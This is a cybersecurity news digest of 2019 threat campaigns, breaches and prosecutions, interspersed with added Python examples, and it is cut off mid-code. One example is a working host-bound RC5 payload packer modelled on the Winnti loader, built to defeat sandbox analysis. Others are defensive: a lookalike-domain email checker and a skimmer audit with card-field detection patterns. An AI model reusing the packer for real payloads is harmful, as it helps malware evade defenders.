The Treasury Department's Office of Foreign Assets Control announced sanctions targeting three state-sponsored malicious cyber groups responsible for North Korea's malicious cyber activity on critical infrastructure. The department said that the Lazarus Group, Bluenoroff, and Andariel were responsible for cyber attacks on critical infrastructure and financial institutions and the 2018 WannaCry hack on the National Health Service in the UK. Sigal Mandelker, Treasury Under Secretary for Terrorism and Financial Intelligence, said, "Treasury is taking action against North Korean hacking groups that have been perpetrating cyber attacks to support illicit weapon and missile programs."
A Sednit (also known as APT28, Fancy Bear, Sofacy, and STRONTIUM) campaign launched on August 20 to take aim at embassies and ministries of foreign affairs in Eastern European and Central Asian countries, ESET researchers learned. The campaign, which had previously been described by the security team at Telsy TRT, started with a phishing email containing a malicious attachment that delivered a long chain of downloaders, ending with a backdoor. ESET discovered that Sednit added the Nim language to its toolset for use in its downloader, updated its Golang download malware, and rewrote its backdoor from Delphi into Golang.
Threat actors launched cyber attacks on the European aerospace company Airbus, unnamed sources told AFP. There have been four attacks which began in 2018 and continued into 2019. The sources said that Rolls-Royce, French technology consultancy Expleo, and two French contractors working for Airbus were the targets. Several of the unnamed individuals said that the attackers appeared to be looking for technical documentation that links to the certification process for Airbus aircraft components. The hackers also stole documents related to the turbo prop engines used in Airbus military planes and details on the propulsion systems and avionics systems for the Airbus A350 passenger plane. Although it is not clear which threat entity is behind these attacks, the sources pointed to Chinese hackers. Airbus did not respond to the report. Rolls-Royce would not comment on specifics of any attack and Expleo refused to confirm or deny the events.
Andrei Tyurin, the Russian man responsible for stealing the data of more than 100 million individuals via a massive hacking campaign that hit JPMorgan Chase, has pled guilty to six counts, including computer hacking conspiracy and bank fraud, the Department of Justice (DOJ) announced. The scheme took place between 2012 and 2013 and compromised the data of over 100 million financial customers, including 83 million from JPMorgan Chase. Charges against three other individuals involved in this hack are pending.
Kaspersky has uncovered a widespread malicious email campaign aimed at stealing Microsoft user account credentials allowing attackers to access private, corporate information. Executed via an elaborate spam message, these attacks target employees working for large organizations that use business messengers with a function to exchange voice messages and receive voice message notifications through corporate emails. The attack is aimed specifically at corporate mail users and its purpose is to access important business correspondence and confidential commercial data.
A campaign known as POISON CARP is to blame for attacks on senior members of Tibetan groups. These individuals, as revealed by the Citizen Lab team, received malicious links in individually tailored WhatsApp text exchanges with operators posing as non-governmental organization workers, journalists, and other fake personas. The links led to code designed to exploit Web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. The attacks took place between November 2018 and May. POISON CARP employed a total of eight Android browser exploits, an Android spyware kit, one iOS exploit chain, and iOS spyware.
US military veterans are being targeted by the Tortoiseshell threat actor via a fake Web site, Cisco has confirmed. The threat group deployed a Web site designed to help US military veterans find jobs, and the site closely resembled a legitimate service offered by the Department of Commerce. The site prompted users to download an app, which was actually a malicious downloader that deployed spying tools and other malware, including a remote access Trojan called IvizTech.
A suspected Chinese advanced persistent threat group is conducting attacks against technology companies located in Southeast Asia. The threat actors deployed a modified version of the Chinese open-source backdoor called PcShare, which is designed to operate when side-loaded by a legitimate NVIDIA application. According to BlackBerry Cylance, the attackers also deploy a Trojanized screen reader application, replacing the built-in Narrator "Ease of Access" feature in Windows. This backdoor allows them to surreptitiously control systems via remote desktop logon screens without the need for credentials.
Between May and June, Palo Alto Networks observed previously unknown malicious tools used in the targeting of transportation and shipping organizations based in Kuwait. The activity has been dubbed "xHunt" because the threat actor named the tools after character names from the anime series Hunter x Hunter. These tools use HTTP for their command and control (C2) channels and certain variants use DNS tunneling or emails to communicate with the C2 as well. It is likely that this campaign is related to a similar one documented by IBM in 2018.
Check Point Software studied a targeted attack against journalists and human rights activists in Egypt that had been previously reported on by Amnesty International in March. According to the Check Point team, unknown or previously undisclosed malicious artifacts belonging to this operation were uncovered. The attackers began developing mobile applications to monitor their targets and hosted them on Google Play. Upon notification, Google removed the malicious apps. The attacks have been ongoing since at least 2018 and many of the victims are political and social activists, high-profile journalists, and members of non-profit organizations in Egypt.
Prevailion has uncovered new details concerning the MasterMana Botnet, which uses business email compromise schemes and backdoors to pilfer cryptocurrency wallets and has been in operation since at least December 2018. This campaign is attributed to the Gorgon Group, a well-known threat entity. The operation's phishing emails carried infected document attachments. Opening the infected document initiated the attack's multi-pronged, labyrinth-like kill chain, which aids detection evasion by relying upon the trust placed in third-party Web sites and services, such as Bitly, Blogspot, and Pastebin. The threat actors also modified older Pastebin posts to cease execution and added features to avoid sandboxing. Ultimately, the victim would download a .NET DLL that performed process hollowing and loaded a fileless backdoor, either a variant of the Azorult malware or the Revenge remote access Trojan.
A cyber espionage platform dubbed "Attor" by ESET researchers uses two features to avoid detection and analysis. Attor's GSM (Global System for Mobile Communications) plugin uses the AT command protocol and then uses Tor for its network communications for its highly targeted operations. The platform has existed since at least 2013 and monitors victim activities by screenshotting specific applications. Attor is primarily targeting Russian speakers and has been seen attacking diplomats, government institutions, and individuals concerned with their privacy.
FireEye identified and analyzed two new tools in use by the FIN7 threat group. BOOSTWRITE is an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. One variant of BOOSTWRITE contained the Carbanak and RDFSNIFFER payloads. RDFSNIFFER is the second tool and appears to have been developed to tamper with NCR's Aloha Command Center client, a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. RDFSNIFFER contains a backdoor component enabling an attacker to upload, download, execute and/or delete arbitrary files. FireEye notified NCR of the RDFSNIFFER tool.
A Magecart attack compromised the cloud platform of the ecommerce service provider Volusion, resulting in the breach of several online shops. According to Trend Micro, malicious code was placed in a JavaScript library provided by Volusion to its client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. Volusion acknowledged the compromise and deployed a resolution. Trend Micro attributes this compromise to Magecart Group 6, which is also known as FIN6.
RiskIQ has warned that the Magecart group is becoming a serious threat, as the entity's skimmers have appeared over two million times and breached over 18,000 hosts. Magecart's average breach length is 22 days and 17% of malicious advertisements observed by RiskIQ were infected with Magecart skimmers. Magecart actually consists of more than one group of attackers. In a separate report, Malwarebytes and HYAS connected Magecart Group 4 with the well-known Cobalt Group by matching patterns in email addresses that were used to register domains. Group 4 has also been conducting both client-side and server-side skimming, while the other Magecart groups only use client-side skimming.
Two human rights defenders in Morocco have been targeted using surveillance technology developed by the Israel-based company NSO Group, according to research published by Amnesty International. Maati Monjib, an academic and human rights activist, and Abdessadak El Bouchattaoui, a human rights lawyer who has represented protesters from the Hirak El-Rif social justice movement, received SMS messages containing malicious links that, if clicked, would secretly install Pegasus software, allowing the sender to obtain near-total control of the phone. The same technology was used to target an Amnesty staff member and a Saudi Arabian human rights activist in June 2018. NSO Group is known to sell its spyware only to government intelligence and law enforcement agencies, raising concerns that Moroccan security agencies are behind the surveillance.
The Internet Crime Complaint Center (IC3) issued a warning regarding targeted ransomware. According to the FBI, cyber thieves are using email phishing, Remote Desktop Protocol vulnerabilities, and software vulnerabilities to target consumers and companies and to make their activities more effective.
Chinese hackers coordinated a multi-year campaign to obtain information on the components used in the Comac C919 aircraft, which cost less than its competitors and made its maiden flight in 2017, following years of delays due to design flaws. CrowdStrike released a report that the Chinese state-aligned adversary TURBINE PANDA conducted cyber intrusions from roughly 2010 to 2015 against several of the companies that make the C919's various components. The goal was to obtain all the intelligence needed to manufacture the C919 components in China. The campaign included two parts: actual hacking and recruiting employees who worked at the targeted aviation companies. Among those targeted and compromised were Safran Group, Honeywell, and GE. According to the analysis, "Beijing uses a multifaceted system of forced technology transfer, joint ventures, physical theft of intellectual property from insiders, and cyber-enabled espionage to acquire the information it needs."
Alleged hacker Anthony Tyler Nashatka was arraigned in federal court on charges of conspiracy to commit computer fraud and abuse, conspiracy to commit wire fraud, aggravated identity theft and other charges related to a scheme to defraud victims of at least $1.4 million USD in cryptocurrency in December of 2017, the Department of Justice (DOJ) announced. According to an indictment, Nashatka conspired to target a cryptocurrency exchange platform to obtain the private keys and other information of hundreds of its users as part of a scheme to steal the users' cryptocurrency. The indictment further describes how the defendants unlawfully used the identity of a victim to gain access to the platform's domain name settings, caused the transmission of a command to disable all of the cryptocurrency company's servers, diverted users from the actual platform to a fake website, and fraudulently induced victims to input their cryptocurrency addresses and private keys into the fake Web site.
Imperva admitted that a misconfiguration is to blame for a security breach affecting "a subset" of its Cloud Web Application Firewall (WAF) customers. Kunal Anand, Imperva's chief technology officer, said, "Our investigation identified an unauthorized use of an administrative API key in one of our production AWS (Amazon Web Services) accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords." The breach was discovered in August, and the incident is not related to a vulnerability in the Cloud WAF product.
Kaspersky honeypots detected 105 million attacks on Internet of Things (IoT) devices coming from 276,000 unique IP addresses in the first six months of 2019, a figure nearly nine times greater than the number found in the same period of 2018. The findings come from Kaspersky's IoT: A Malware Story report on honeypot activity in H1 2019. The report found that attacks on IoT devices are generally not sophisticated but are stealthy, leaving users unaware that their devices are being exploited. The Mirai malware was used in 39% of the attacks while Nyadrop was seen in 38.57% of attacks.
A ransomware attack hit Pitney Bowes, resulting in encrypted information and disrupted access for clients, the shipping services company said in a statement. "We have seen no evidence that customer accounts or data have been impacted," the company said. Customers will not be able to refill postage meters but can print postage if they have funds loaded in the system. Mailing system products and Your Account access are impacted by this attack.
Investigation into the TA407 (also known as Silent Librarian, Cobalt Dickens, and Mabna Institute) threat actor shows that it is targeting phishing attacks at specific universities in North America and Europe. TA407 uses well-crafted social engineering mechanisms including stolen university branding, fake email signatures/credentials/addresses, university-specific email bodies and portal clones, and themed subject lines. Proofpoint noted that TA407 takes advantage of publicized downtime and weather alerts, among other events, to add credibility to the phish.
The Dukes (also known as APT29 and Cozy Bear) threat group appeared to take a hiatus but the entity has reemerged with new malware implants in ongoing activities that ESET has dubbed "Operation Ghost." This campaign, which appears to have become active in 2013 and is ongoing, is using three malware implants - PolyglotDuke, RegDuke, and FatDuke - and has compromised the ministries of foreign affairs in at least three European countries. At least one European country's embassy in Washington, DC has also been affected. In Operation Ghost, the Dukes have used a limited number of tools but have utilized persistence, a four-stage, sophisticated malware platform, and have avoided communicating with the same command and control infrastructure between different victims.
ESET published details of new Winnti Group activity, including a passive network implant called PortReuse that the group deploys against specific organizations. The Winnti Group, which was behind the ShadowHammer supply chain attack, also uses a VMProtect-packed loader that decrypts position-independent code with RC5, using a key derived from a static string and the volume serial number of the victim's hard drive, and runs it directly; because the key is bound to the host, the payload cannot be recovered on a machine with a different volume serial. The group uses the ShadowPad malware and a custom build of the XMRig cryptocurrency miner as payloads.
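The host-bound decryption described above, as an added example rather than ESET's or the malware's own code. The page says only that the RC5 key is "based on" a static string and the volume serial, so the derivation here (SHA-256 of the two, truncated to 16 bytes), the ECB block mode, the placeholder static string and the "PIC!" length header are all assumptions; the RC5-32/12/16 primitive itself is the standard one.

```python
"""Host-bound payload packing/unpacking in the style of the Winnti loader.

Added example.  Assumed: key = SHA-256(static || serial)[:16], RC5-32/12/16
in ECB, and a 'PIC!' + length header so a wrong key is detected instead of
executing garbage.  The static string below is a placeholder.
"""
import hashlib
import struct

P32, Q32, MASK = 0xB7E15163, 0x9E3779B9, 0xFFFFFFFF
ROUNDS = 12
MAGIC = b"PIC!"
STATIC_STRING = b"constructed-static-string"   # placeholder; real value not on the page


def _rotl(x, y):
    y &= 31
    return ((x << y) | (x >> (32 - y))) & MASK


def _rotr(x, y):
    y &= 31
    return ((x >> y) | (x << (32 - y))) & MASK


def rc5_expand_key(key, rounds=ROUNDS):
    """RC5 key schedule for w=32: returns the 2*(rounds+1) subkeys S."""
    c = max(1, (len(key) + 3) // 4)
    L = [0] * c
    for i, byte in enumerate(key):               # little-endian words from key bytes
        L[i // 4] |= byte << (8 * (i % 4))
    t = 2 * (rounds + 1)
    S = [0] * t
    S[0] = P32
    for i in range(1, t):
        S[i] = (S[i - 1] + Q32) & MASK
    A = B = i = j = 0
    for _ in range(3 * max(t, c)):
        A = S[i] = _rotl((S[i] + A + B) & MASK, 3)
        B = L[j] = _rotl((L[j] + A + B) & MASK, (A + B) & MASK)
        i, j = (i + 1) % t, (j + 1) % c
    return S


def rc5_encrypt_block(S, block, rounds=ROUNDS):
    A, B = struct.unpack("<II", block)
    A, B = (A + S[0]) & MASK, (B + S[1]) & MASK
    for r in range(1, rounds + 1):
        A = (_rotl(A ^ B, B) + S[2 * r]) & MASK
        B = (_rotl(B ^ A, A) + S[2 * r + 1]) & MASK
    return struct.pack("<II", A, B)


def rc5_decrypt_block(S, block, rounds=ROUNDS):
    A, B = struct.unpack("<II", block)
    for r in range(rounds, 0, -1):
        B = _rotr((B - S[2 * r + 1]) & MASK, A) ^ A
        A = _rotr((A - S[2 * r]) & MASK, B) ^ B
    return struct.pack("<II", (A - S[0]) & MASK, (B - S[1]) & MASK)


def derive_host_key(volume_serial, static_string=STATIC_STRING):
    """Assumed derivation: hash(static string || serial) truncated to a 16-byte key.
    On a victim the serial would come from GetVolumeInformationW on the system drive."""
    return hashlib.sha256(static_string + struct.pack("<I", volume_serial)).digest()[:16]


def pack_payload(pic, volume_serial):
    """Encrypt position-independent code so only a host with this serial can recover it."""
    S = rc5_expand_key(derive_host_key(volume_serial))
    plain = MAGIC + struct.pack("<I", len(pic)) + pic
    plain += b"\x00" * (-len(plain) % 8)         # zero-pad to the 8-byte block size
    return b"".join(rc5_encrypt_block(S, plain[i:i + 8]) for i in range(0, len(plain), 8))


def unpack_payload(blob, volume_serial):
    """Decrypt and validate; returns None when the serial (and so the key) is wrong."""
    if len(blob) < 8 or len(blob) % 8:
        return None
    S = rc5_expand_key(derive_host_key(volume_serial))
    plain = b"".join(rc5_decrypt_block(S, blob[i:i + 8]) for i in range(0, len(blob), 8))
    if plain[:4] != MAGIC:
        return None
    length = struct.unpack("<I", plain[4:8])[0]
    if length > len(plain) - 8:
        return None
    return plain[8:8 + length]


if __name__ == "__main__":
    serial = 0x1C2D3E4F                               # constructed volume serial
    blob = pack_payload(b"\x90\x90\xc3", serial)      # constructed stand-in for real PIC
    print(unpack_payload(blob, serial))               # the payload comes back on the right host
    print(unpack_payload(blob, serial + 1))           # None: a sandbox with another serial gets nothing
```

The practical consequence for analysts is the last line: a sample packed this way does nothing useful in a sandbox or on an analyst's VM, so recovering the payload means either pulling the volume serial from the victim machine or patching the loader's serial lookup. The RC5 routine is checked against the published RC5-32/12/16 all-zero test vector.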
Scientists at Malwarebytes have connected the Carbanak threat gang to the Magecart Group 5 cybercriminal group and Dridex phishing campaigns. Magecart is a group of affiliates who use malicious JavaScript to steal payment data from shoppers, mostly on checkout pages. Magecart Group 5 targets the supply chain used by online merchants. While analyzing Magecart Group 5's domains, Malwarebytes noticed several that connected to Dridex phishing campaigns. Dridex, a well-known banking Trojan, has often been used as an initial infection vector in attacks that deliver the Carbanak malware as the payload. The Carbanak gang use the malware of the same name.
The Federal Trade Commission (FTC) has barred the developers of three stalking apps from selling apps that monitor consumers' mobile devices unless they take certain steps to ensure the apps will only be used for legitimate purposes. The FTC alleges that Retina-X and its owner, James N. Johns, Jr., developed three mobile device apps that allowed purchasers to monitor the mobile devices on which they were installed, without the knowledge or permission of the device's user. The apps - known as MobileSpy, PhoneSheriff, and TeenShield - allowed purchasers to access sensitive information about device users, including the user's physical movements and online activities. At the same time, devices on which the apps were installed were exposed to security vulnerabilities.
An October 17 malware attack on financial services provider Billtrust resulted in an outage of the company's services, Bleeping Computer reported. Although the company did not publicly acknowledge the attack, customer Wittichen Supply announced that it had been notified by Billtrust of the malware incident. According to Wittichen Supply, no customer data was impacted and services were in the process of being restored from backups. An anonymous source told Bleeping Computer that Billtrust was affected by the BitPaymer ransomware.
The National Security Agency (NSA) and the UK's National Cyber Security Center (NCSC) released a joint advisory on the Turla (also known as Waterbug and Venomous Bear) advanced persistent threat group that is widely thought to be associated with Russia. Previous advisories from the NCSC detailed Turla's use of Neuron and Nautilus implants and an ASPX-based backdoor alongside the Snake rootkit. Since those advisories were published, analysis of additional victims and infrastructure shared between the NCSC, NSA, and partners determined that the Neuron and Nautilus tools were very likely Iranian in origin. Those behind Neuron or Nautilus were almost certainly not aware of, or complicit with, Turla's use of their implants. After acquiring the tools and the data needed to use them operationally, Turla first tested them against victims it had already compromised using its Snake toolkit, and then deployed the Iranian tools directly to additional victims.
A Texas man who was found guilty of hacking into the Los Angeles Superior Court (LASC) computer system, using the system to send approximately two million malicious phishing emails, and fraudulently obtaining hundreds of credit card numbers was sentenced to 145 months in federal prison. The Department of Justice (DOJ) announced that Oriyomi Sadiq Aloba and his co-conspirators targeted the LASC for a phishing attack. During the attack, the email account of one court employee was compromised and used to send phishing emails to coworkers purporting to be from the file-hosting service Dropbox. The email contained a link to a bogus Web site that asked for the users' LASC email addresses and passwords. Thousands of court employees received the Dropbox email, and hundreds disclosed their email credentials to the attacker. The compromised email accounts then were used to send millions of phishing emails.
Microsoft tracked new attacks linked to the Strontium (also known as Sofacy, Fancy Bear, and APT28) threat entity that focused on anti-doping authorities and sporting organizations around the world. At least 16 national and international sporting and anti-doping organizations across three continents were targeted in these attacks, which began September 16. The methods used in the attacks are similar to those previously used by Strontium: spear phishing, password spray, exploiting Internet-connected devices, and the use of both open-source and custom malware.
Group-IB uncovered a database holding more than 1.3 million credit and debit card records of mostly Indian banks' customers that was uploaded to Joker's Stash on October 28. The underground market value of the database is estimated at more than $130 million USD. Joker's Stash is an underground credit card shop. This particular dump, in which 98% of the cards belong to Indian banks, can be used to produce cloned cards for further cashouts.
Lookout has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but the attack is still ongoing. The infrastructure connected to this attack has been live since March. Two domains, session-services[.]com and service-ssl-check[.]com, have hosted the phishing content and resolved to two IP addresses over the course of the campaign; the phishing pages include keylogging functionality and detect mobile browsers so that the lure renders convincingly on phones.
While researching a malware sample spread by the Rig exploit kit (EK), the researchers at Check Point Software were led to the HackForums underground market where they learned about the hacking community and the EK itself in some detail. The scientists discovered that a new hacker can easily start up a business after joining an underground forum and buying different cyber attack products. Additionally, Rig EK miscreants are actively reselling the exploitation service to different customers on different "flows" and providing them with a Rig public statistics link. This allows customers to re-resell this service to their own customers and distribute whatever variant they have.
A phishing scam targeting users of the Steam online gaming platform has spiked since June, the researchers at Kaspersky say. Attackers lure users to sites that mimic or copy online stores linked to Steam that sell in-game items. The fake resources are high-quality, making it difficult to distinguish them from the real thing.
Cisco's Talos researchers discovered a server hosting a large stockpile of malicious files. Analysis of these files shows that the attackers were able to obtain a deep level of access to victims' infrastructure, enabling Talos to identify several targets of these attacks, including one American manufacturing company. The server contained a number of malicious files, including the DoppelPaymer ransomware, the TinyPOS credit card scraping malware, and loaders that execute code delivered from the command and control server. The attack targets have been notified. According to the analysis, the attacker appears to be targeting medium-sized companies in the industrial space.
Cisco Talos discovered several malware distribution campaigns where the adversaries were utilizing the names and likenesses of prominent political figures, including President Trump, Hillary Clinton, and Vladimir Putin. Some of the applications are designed to coerce victims into paying ransom demands, while others could be used to gain backdoor access to systems and provide attackers the ability to operate within organizational networks.
The US Department of Justice (DOJ) has exposed a major iPhone and iPad fraud ring operating out of California. The agency raided two businesses and several homes in Mira Mesa and Mission Hills, California, seizing over $250,000 in cash and 90 iPhones that may include counterfeit parts. Apparently, the operation revolved around acquiring counterfeit iPhones and iPads from China, importing them to the US, intentionally breaking the devices, and having Apple replace them under warranty with genuine iPhones and iPads. The legitimate units were then returned to China for sale. The crime was allegedly perpetrated by three brothers, Zhiwei Loop Liao, Zhimin Liao, and Zhiting Liao, all of whom are considered fugitives at the time of writing. An additional 11 individuals have been charged in the case, which is believed to have moved more than 10,000 iPhones and iPads during its time in operation. According to the DOJ, the ring escaped detection for so long by acquiring legitimate IMEI (International Mobile Equipment Identity) numbers from real Apple products and applying them to the counterfeit devices before turning them in for replacement.
Trend Micro has tracked the APT33 adversary using about a dozen command and control servers to narrowly target its attacks, with multiple layers of obfuscation to avoid detection. Its researchers observed targeted campaigns against organizations in the Middle East, the US, and Asia. Among the active infections in 2019 are two separate locations of a private American company that offers services related to national security, victims connecting from a university and a college in the US, a victim most likely related to the US military, and several victims in the Middle East and Asia.
The Royal Canadian Mounted Police (RCMP) announced charges against John Paul Revesz of Toronto for allegedly operating an international malware scheme under the company name "Orcus Technologies." An RCMP criminal investigation began in July 2016 after reports that a significant number of computers were being infected with a remote access Trojan. A search warrant was executed at the accused's residence in March 2019, and electronic devices were seized and later analyzed. The evidence obtained shows that the RAT infected computers around the world, victimizing thousands of people in multiple countries.
A Russian national has been extradited to the US to face charges for running a criminal online marketplace that facilitated payment card fraud, computer hacking, and other crimes, the Justice Department (DOJ) announced. Aleksei Burkov allegedly ran a Web site called "Cardplanet" that sold payment card numbers that had been stolen primarily through computer intrusions. Many of the cards offered for sale belonged to US citizens. The stolen data from more than 150,000 compromised payment cards was allegedly sold on Burkov’s site and has resulted in over $20 million USD in fraudulent purchases made on US credit cards. Additionally, Burkov allegedly ran another online cybercrime forum that served as an invite-only club where elite cybercriminals could meet and post in a secure location to plan various cybercrimes, to buy and sell stolen goods and services.
The Justice Department (DOJ) announced that Sergiy P. Usatyuk of Orland Park, IL has been sentenced to 13 months in prison, followed by three years of supervised release on one count of conspiracy to cause damage to Internet-connected computers for his role in owning, administering, and supporting illegal booter services that launched millions of illegal distributed denial-of-service (DDoS) attacks against victim computer systems in the United States and elsewhere. According to the criminal information, Usatyuk combined with a co-conspirator to develop, control, and operate a number of booter services and booter-related Web sites from around August 2015 through November 2017 that launched millions of DDoS attacks that disrupted the Internet connections of targeted victim computers, rendered targeted Web sites slow or inaccessible, and interrupted normal business operations.
Louisiana's state government was crippled by a ransomware attack that affected the Office of Motor Vehicles (OMV), the Department of Health, and the Department of Transportation and Development. The attack began on November 18 and resulted in the shuttering of various state Web sites. Some services were shut down as a precautionary measure. According to Fox 8 News, business at all 79 OMV locations came to a halt. An official said that ransomware was to blame but that the state had not paid the ransom, nor did it appear that any key data had been locked. Governor John Bel Edwards tweeted that he had mobilized the state's cybersecurity team to help disrupt the attack.
Security researcher Brian Krebs learned that National Veterinary Associates (NVA), a company that owns over 700 animal care facilities around the globe, has been victimized by a ransomware attack that affected more than half of its practices. Although NVA declined to comment on the malware or whether it had paid the ransom, KrebsOnSecurity learned that the incident was discovered on October 27 and that two forensic firms were hired to investigate. An anonymous source told Krebs that the Ryuk ransomware was to blame and that an earlier ransomware attack, which occurred a few months prior, had also involved Ryuk. Approximately 400 NVA locations have been affected.
More than 20 hotels in Latin America, Europe and Asia have fallen victim to targeted malware attacks conducted by several threat entities, including RevengeHotels. The campaign, which has been active since 2015 but has grown since January, involves different groups using traditional remote access Trojans (RATs) to infect businesses in the hospitality sector. Research from Kaspersky shows that at least two groups, RevengeHotels and ProCC, are part of the campaign, though more cybercriminal groups are potentially involved. The main attack vector is email with crafted malicious documents attached. Some of the documents exploit a Windows vulnerability and then use VBS and PowerShell scripts to load the payload, which installs customized versions of various RATs and other custom malware, such as ProCC, on the victim's machine; these can later execute commands and set up remote access to the infected systems.
Check Point Software uncovered an elaborate business email compromise scheme that involved an entity using highly sophisticated tactics - including email communications - to trick both parties and steal $1 million USD. The case involves two legitimate companies - a Chinese venture capital fund and an Israeli startup - and a wire transfer. After realizing the theft, the startup tapped Check Point for help. Upon analysis, Check Point determined that the attacker had spotted the correspondence between the two companies ahead of the anticipated wire transfer and set up two lookalike domains to resemble the legitimate companies. The attacker then began corresponding with both the venture capital fund and the startup, spoofing the email addresses of each company. Check Point's Matan Ben David said, "This infrastructure gave the attacker the ability to conduct the ultimate Man-In-The-Middle (MITM) attack. Every email sent by each side was in reality sent to the attacker, who then reviewed the email, decided if any content needed to be edited, and then forwarded the email from the relevant lookalike domain to its original destination."
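The lookalike-domain relay described above is cheap to detect on the receiving side if the mail gateway knows the real domains of both counterparties. Below is an added example of such a check (not Check Point's code, and not tied to the real companies in the case): the trusted domains, the header samples and the homoglyph substitutions are constructed for illustration.

```python
"""Lookalike-domain check for the two sides of a wire-transfer thread.

Added example.  The trusted domains, the sample messages and the character
substitutions are constructed; they are not from the Check Point case.
"""
import email
import email.utils

# Assumed: the genuine domains of both counterparties, taken from the signed
# contract or vendor master data, never from the mail thread being checked.
TRUSTED_DOMAINS = {"example-vc.com", "example-startup.io"}

# Visual confusions commonly used when registering lookalike domains.
_SUBSTITUTIONS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("-", ""))


def normalize(label):
    """Collapse homoglyph tricks so 'exarnp1e-vc' and 'example-vc' compare equal."""
    label = label.lower()
    for bad, good in _SUBSTITUTIONS:
        label = label.replace(bad, good)
    return label


def registrable(domain):
    """Second-level label ('example-vc' for 'mail.example-vc.com').  Assumes a
    one-label public suffix; use a public-suffix list for .co.uk-style TLDs."""
    parts = domain.lower().strip().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a, b):
    """Levenshtein distance, used to catch single-character typo squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain that `domain` imitates, or None if `domain` is
    itself trusted or unrelated.  Catches TLD swaps, homoglyphs and one typo."""
    domain = domain.lower().strip()
    if domain in trusted:
        return None
    mine = normalize(registrable(domain))
    for t in sorted(trusted):
        theirs = normalize(registrable(t))
        if mine == theirs or edit_distance(mine, theirs) <= 1:
            return t
    return None


def sender_domains(raw):
    """Domains from the headers a recipient sees or replies to."""
    msg = email.message_from_bytes(raw)
    found = {}
    for header in ("From", "Reply-To", "Return-Path"):
        value = msg.get(header)
        if value:
            _, addr = email.utils.parseaddr(value)
            if "@" in addr:
                found[header] = addr.rsplit("@", 1)[1].lower()
    return found


def check_message(raw):
    """Findings for one message; an empty list means the sender headers are consistent."""
    doms = sender_domains(raw)
    findings = []
    for header, d in doms.items():
        target = lookalike_of(d)
        if target:
            findings.append("%s domain %s imitates trusted %s" % (header, d, target))
    if doms.get("Reply-To") and doms.get("From") and doms["Reply-To"] != doms["From"]:
        findings.append("Reply-To %s differs from From %s" % (doms["Reply-To"], doms["From"]))
    return findings


# Constructed samples: the relayed copy comes from a domain with 'rn' in place of 'm'.
RELAYED = b"""From: "Deal Team" <deals@exarnple-vc.com>
To: cfo@example-startup.io
Subject: Updated wire instructions

Please use the account below for the first tranche.
"""
GENUINE = b"""From: "Deal Team" <deals@example-vc.com>
To: cfo@example-startup.io
Subject: Term sheet

Signed copy attached.
"""

if __name__ == "__main__":
    print(check_message(RELAYED))    # one finding naming exarnple-vc.com
    print(check_message(GENUINE))    # []
```

The check is only as good as the trusted list, which is why it must come from a record established out of band (the contract, a phone call to a known number) and not from the thread itself: in the case above, both victims had been corresponding with the attacker's domains for long enough that "the address we have been using" was exactly the wrong reference.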
A hacking tool that gave cybercriminals full remote control of a victim's computer has been taken down as a result of an international law enforcement operation targeting the sellers and users of the Imminent Monitor Remote Access Trojan (IM-RAT). The investigation, led by the Australian Federal Police (AFP), with international activity coordinated by Europol and Eurojust, involved numerous judicial and law enforcement agencies. The tool had been used across 124 countries and sold to over 14,000 buyers, and it can no longer be used by anyone who purchased it. Once installed undetected, IM-RAT gave cybercriminals free rein over the victim's machine. It sold for as little as $25 USD.
KrebsOnSecurity reported that four million payment cards gleaned from a breach of four restaurant chains are for sale on the Joker's Stash, a cybercriminal underground market. Two financial industry sources told researcher Brian Krebs that the payment cards had all been used at Krystal, Moe's, McAlister's Deli, and Schlotsky's. Krystal confirmed in October that it had been breached while the other restaurants are all part of the same parent company and announced breaches in August.
A group affiliated with the Magecart attacks has expanded from phishing into card skimming. The group, dubbed "Fullz House," sells packages of individuals' identifying information (known as "fullz") on its BlueMagicStore site. The group also uses skimming to sell payment card information on its carding store, CardHouse. Fullz House isn't new to the cybercriminal world, but it ramped up its activities beginning in August-September. While the two parts of this group's operation are mainly split, there is a slight overlap in its attack infrastructure in domain-to-IP address resolution data. The sales platforms this group operates also share infrastructure with the operations that steal cards or payment credentials. RiskIQ has published its analysis of Fullz House. Magecart is not a specific entity but an umbrella term for several splinter groups that all use the same tactics to compromise ecommerce sites and inject scripts to steal payment card data.
Malwarebytes spotted a number of skimmers hosted on Heroku, a container-based cloud Platform as a Service owned by Salesforce. Magecart threat actors are leveraging the service to host their skimmer infrastructure and collect stolen credit card data. Developers can use Heroku to build apps in a variety of languages and deploy them seamlessly at scale; the Magecart thieves were registering free accounts to host their skimming operation. After Malwarebytes notified Salesforce of the activity, the instances were removed.
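Whether the skimmer is hosted on Heroku or anywhere else, what a merchant can check for is script being loaded from, or card data being sent to, a host that is not on the checkout page's own allowlist. The audit below is an added example (not Malwarebytes' or RiskIQ's code): the shop hostname, the allowlist, and the sample page, including its herokuapp.com hostname, are constructed. It flags both an injected external script and an inline handler that reads card fields and beacons them out, and emits the Content-Security-Policy that would enforce the same allowlist in the browser.

```python
"""Audit a checkout page for scripts and exfiltration that do not belong to the shop.

Added example.  The shop hostname, allowlist and page HTML (including the
herokuapp.com hostname) are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_HOST = "shop.example"
# Assumed allowlist: the only hosts that should serve script on the checkout page.
ALLOWED_SCRIPT_HOSTS = {PAGE_HOST, "cdn.shop.example", "pay.example-psp.com"}

# Inline code that reads payment fields and pushes them to a foreign host is the skimmer shape.
_CARD_FIELDS = re.compile(r"card|cvv|cvc|expir|ccnum", re.I)
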